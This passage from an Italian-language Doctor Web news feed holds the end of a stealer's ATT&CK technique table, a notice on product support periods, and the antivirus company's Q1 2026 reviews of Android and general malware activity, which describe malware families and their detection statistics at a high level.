&lt;p&gt;Intercettazione dei dati di input (T1056)&lt;/p&gt;
&lt;p&gt;Intercettazione dell'input nell'interfaccia grafica (T1056.002)&lt;/p&gt;
&lt;p&gt;Archiviazione dei dati raccolti (T1560)&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Comando e controllo&lt;/td&gt;
&lt;td&gt;Servizio web (T1102)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Esfiltrazione dei dati&lt;/td&gt;
&lt;td&gt;&lt;p&gt;Esfiltrazione automatizzata (T1020)&lt;/p&gt;
&lt;p&gt;Esfiltrazione tramite il canale C2 (T1041)&lt;/p&gt;
&lt;p&gt;Esfiltrazione tramite il servizio web (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;
&lt;p&gt;Maggiori informazioni su&amp;nbsp;&lt;a href="https://vms.drweb-av.it/search/?q=Mac.PWS.JobStealer.1&amp;lng=it"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15257&amp;lng=it</guid><title>Modificati i periodi di supporto dei prodotti Dr.Web</title><link>https://news.drweb-av.it/show/?i=15257&amp;lng=it&amp;c=5</link><pubDate>Tue, 26 May 2026 12:22:03 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;In conformità alla politica del ciclo di vita, sono stati estesi i periodi di supporto di una serie di prodotti Dr.Web.&lt;/newslead&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Pannello di controllo di Dr.Web Enterprise Security Suite, versione 13.0&lt;/li&gt;&lt;li&gt;Dr.Web Industrial, versione 13.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Desktop Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 per postazioni Windows&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 per postazioni macOS&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 per postazioni Linux&lt;/li&gt;&lt;li&gt;Dr.Web Katana Business Edition 1.0&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Server Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 per server Windows&lt;/li&gt;&lt;li&gt;Dr.Web 11.1 per server UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 per server macOS&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Mail Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 per mail server UNIX&lt;/li&gt;&lt;li&gt;Dr.Web 12.0 per Microsoft Exchange Server&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Gateway Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 11.1 per gateway internet UNIX&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Come parte di Dr.Web Mobile Security Suite:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Dr.Web 12.0 per dispositivi mobili Android&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Le informazioni aggiornate sui periodi di supporto sono disponibili sulla pagina del ciclo di vita dei prodotti.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15136&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per dispositivi mobili in I trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15136&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 aprile 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, nel I trimestre 2026 è continuato il calo dell'attività dei programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, che visualizzano annunci pubblicitari invadenti. Quelli primi venivano rilevati sui dispositivi protetti il 32,70% e quelli secondi il 7,09% in meno rispetto al IV trimestre dell'anno scorso. Hanno ceduto la posizione leader ai trojan bancari della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, la cui attività negli ultimi 3 mesi è aumentata di oltre 2,5 volte. Di conseguenza, questi ultimi sono diventati le minacce Android più diffuse. Tali applicazioni malevole intercettano gli SMS con codici monouso per la conferma di operazioni bancarie, visualizzano finestre di phishing, e inoltre, possono imitare l'aspetto esteriore dei veri software bancari per rubare i dati confidenziali. Il più delle volte, gli utenti riscontravano i trojan della sottofamiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, che include una varietà di programmi malevoli.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Sono state largamente diffuse nel I trimestre (il 15,35% del numero totale di rilevamenti) le applicazioni in cui tramite gli strumenti hacker per il modding NP Manager è aggiunto il codice spazzatura allo scopo di confondere la logica. Dall'autunno dello scorso anno questi strumenti vengono attivamente utilizzati nei trojan della famiglia &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; per contrastare il rilevamento da parte degli antivirus, pertanto, noi avvertiamo che una determinata applicazione è stata modificata. I prodotti antivirus Dr.Web rilevano i simili programmi come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Un altro software potenzialmente pericoloso, nonostante un calo del numero di rilevamenti del 31,65%, di nuovo sono stati i programmi modificati con l'ausilio dell'utility NP Manager (Dr.Web li rileva come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.NPMod&amp;lng=it"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;). Questa utility contiene diversi moduli per la protezione e l'offuscamento del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. I cybercriminali la utilizzano per la protezione dei malware allo scopo di ostacolarne il rilevamento da parte degli antivirus.&lt;/p&gt;

&lt;p&gt;Le applicazioni indesiderate più diffuse sono stati i falsi antivirus &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; che rilevano presunte minacce, per "eliminare" le quali, richiedono l'acquisto di una versione completa. Inoltre, gli utenti di nuovo dovevano affrontare i programmi dalle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;. Quelli primi presumibilmente consentirebbero di guadagnare con lo svolgimento di vari compiti. Quelli secondi rappresentano software modificati tramite il servizio cloud CloudInject. Tramite questo servizio, alle applicazioni vengono aggiunti pericolose autorizzazioni di sistema e un codice offuscato, le cui funzionalità è impossibile controllare.&lt;/p&gt;

&lt;p&gt;Tra i software pubblicitari, leader per numero di rilevamenti sono diventati i programmi di ottimizzazione &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema. Il loro obiettivo è di visualizzare annunci pubblicitari durante "l'ottimizzazione". Un altro popolare software pubblicitario sono state le applicazioni &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, che i malintenzionati spacciano per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, tali programmi caricano vari siti con annunci. Di nuovo erano diffusi anche i programmi con moduli pubblicitari incorporati &lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;A gennaio l'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15110" target="_blank"&gt;ha informato&lt;/a&gt; gli utenti di &lt;b&gt;Android.Phantom&lt;/b&gt; — una nuova famiglia di applicazioni trojan clicker. I nostri analisti dei virus hanno identificato diverse fonti di distribuzione di questi malware. Tra di esse, lo store di applicazioni ufficiale per dispositivi Xiaomi GetApps, dove i trojan erano incorporati in alcuni giochi. Oltre a questo, i cybercriminali distribuivano i clicker insieme a mod di popolari applicazioni tramite diversi canali Telegram, server Discord, raccolte software online e siti malevoli.&lt;/p&gt;

&lt;p&gt;Tramite &lt;b&gt;Android.Phantom&lt;/b&gt;, i malintenzionati aumentano artificialmente i clic pubblicitari su siti web, impiegando per questo le tecnologie di machine learning e la WebRTC — tecnologia di trasmissione in streaming di dati (inclusi video) attraverso il browser. I trojan caricano in una WebView invisibile le risorse internet target insieme a un codice JavaScript per la simulazione di azioni utente. L'interazione con gli annunci avviene in una delle due modalità. Se sul dispositivo è possibile l'utilizzo della WebRTC, i clicker &lt;b&gt;Android.Phantom&lt;/b&gt; trasmettono in streaming lo schermo virtuale con un sito caricato ai malintenzionati, i quali lo gestiscono manualmente o utilizzando un sistema automatizzato.&lt;/p&gt;

&lt;p&gt;Se la WebRTC non è disponibile, vengono impiegati script automatizzati in JavaScript che utilizzano il framework TensorFlowJS. I clicker scaricano dal server remoto il modello comportamentale richiesto, nonché il JavaScript contenente il framework stesso e tutte le funzioni necessarie per il funzionamento del modello e l'interazione con i siti target.&lt;/p&gt;

&lt;p&gt;Durante il I trimestre, il laboratorio antivirus dell'azienda Doctor Web ha registrato la comparsa di nuove minacce sullo store di app Google Play. Queste includevano numerose applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, nonché i programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;. Questi ultimi sono progettati per abbonare utenti a servizi a pagamento.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di i trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; sono diventati le minacce Android più diffuse&lt;/li&gt;
        &lt;li&gt;Malintenzionati utilizzano sempre più spesso gli strumenti per il modding di programmi Android allo scopo di proteggere i trojan bancari&lt;/li&gt;
        &lt;li&gt;Continuato il calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Diventate diffuse le applicazioni trojan &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano il machine learning e streaming video per l'aumento artificiale dei clic su siti web&lt;/li&gt;
        &lt;li&gt;Rilevate nuove applicazioni malevole sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan bancario che intercetta gli SMS con codici monouso da istituti di credito, il contenuto di notifiche, nonché raccoglie altre informazioni confidenziali. Queste ultime includono dati tecnici sul dispositivo infetto, la lista di applicazioni installate, informazioni sulla scheda SIM, su chiamate ed SMS ricevuti e inviati.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue, e in alcuni casi, vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza nel sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un programma di offuscamento, utilizzato, tra l'altro, per la protezione di applicazioni malevole (ad esempio, di alcune versioni dei trojan bancari &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito, hanno una lista di sistemi di pagamento e banche più popolari, attraverso cui presumibilmente sarebbe possibile ritirare i premi. Ma anche quando gli utenti riescono ad accumulare la somma da ritirare sufficiente, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, il modificatore ottiene la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma per il monitoraggio dei proprietari di dispositivi Android. Consente di leggere SMS, ottenere informazioni su chiamate, tracciare la posizione del dispositivo e registrare l'audio dell'ambiente circostante.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi Android in cui tramite strumenti hacker per il modding di applicazioni è aggiunto codice spazzatura. Tale modificazione viene eseguita allo scopo di confondere la logica dei programmi. Questa tecnica è spesso riscontrata nei trojan bancari e nelle versioni pirata di software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi di ottimizzazione che creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema allo scopo di visualizzare annunci pubblicitari durante "l'ottimizzazione".&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo adware che può essere integrato in programmi Android. Visualizza notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questo modulo raccoglie una serie di dati riservati, ed è in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applicazioni spacciate per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, sono creati per la visualizzazione di pubblicità. Questi programmi ricevono dal server remoto la configurazione, in base alla quale caricano un sito target con annunci: banner, finestre a comparsa, filmati ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app, e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Nel I trimestre 2026 gli specialisti del laboratorio antivirus Doctor Web hanno individuato sullo store di app Google Play ulteriori applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono le vittime a servizi a pagamento. I trojan erano nascosti in una serie di utility per l'ottimizzazione del funzionamento di dispositivi Android, nonché venivano distribuiti sotto le false apparenze di app di messaggistica, software multimediali e altri. Gli utenti li hanno installati complessivamente 370.000 volte.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di malware &lt;b&gt;Android.Joker&lt;/b&gt;, rilevati su Google Play nel I trimestre 2026. &lt;b&gt;Android.Joker.2511&lt;/b&gt; era incorporato nell'app di messaggistica Private Chat Message, e &lt;b&gt;Android.Joker.2524&lt;/b&gt; nel programma fotocamera Magic Camera&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Inoltre, i nostri analisti di virus hanno rilevato i programmi malevoli denominati &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;, anche questi studiati per abbonare utenti a servizi a pagamento. I trojan caricano siti web su cui tramite la tecnologia Wap Click vengono attivati abbonamenti mobili a pagamento. Su questi siti agli utenti viene chiesto il numero di cellulare, dopodiché avviene un tentativo di abbonamento automatico al servizio. Complessivamente le due applicazioni malevole sono state scaricate dallo store Google Play oltre 1.500.000 volte.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Malware &lt;b&gt;Android.Subscription.23&lt;/b&gt; e &lt;b&gt;Android.Subscription.24&lt;/b&gt; venivano distribuiti con il pretesto delle app per la gestione di finanze personali Stream Hive e Prime Link, tuttavia, la loro unica funzionalità consisteva nel caricare i siti per l'abbonamento di proprietari di dispositivi Android a servizi mobili a pagamento&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per la protezione dei dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15135&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in I trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15135&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 aprile 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel I trimestre 2026 il numero totale di minacce rilevate è diminuito del 6,77% rispetto al IV trimestre dell'anno scorso. Il numero di minacce uniche è diminuito dell'11,98%. Prevalentemente sui dispositivi protetti venivano rilevati i software pubblicitari e i trojan pubblicitari, i programmi malevoli downloader, nonché i backdoor.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Nel traffico email i rilevamenti più frequenti sono stati gli script malevoli, i backdoor e le varie applicazioni trojan. Tramite messaggi email i malintenzionati distribuivano anche i documenti di phishing e gli exploit.&lt;/p&gt;

&lt;p&gt;Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione hanno riscontrato predominantemente &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; e &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Nel I trimestre 2026, gli analisti internet dell'azienda Doctor Web hanno individuato nuovi siti di phishing, incluse false risorse di istituti di credito e di marketplace, nonché una serie di altri siti indesiderati.&lt;/p&gt;

&lt;p&gt;Nel segmento di dispositivi mobili, si osservava un'attività aumentata dei trojan bancari. In particolare, i nostri analisti di virus hanno notato una crescente popolarità di un metodo di protezione dei malware dal rilevamento dai software antivirus, che consiste nell'aggiungere ai malware il codice spazzatura. &lt;/p&gt;

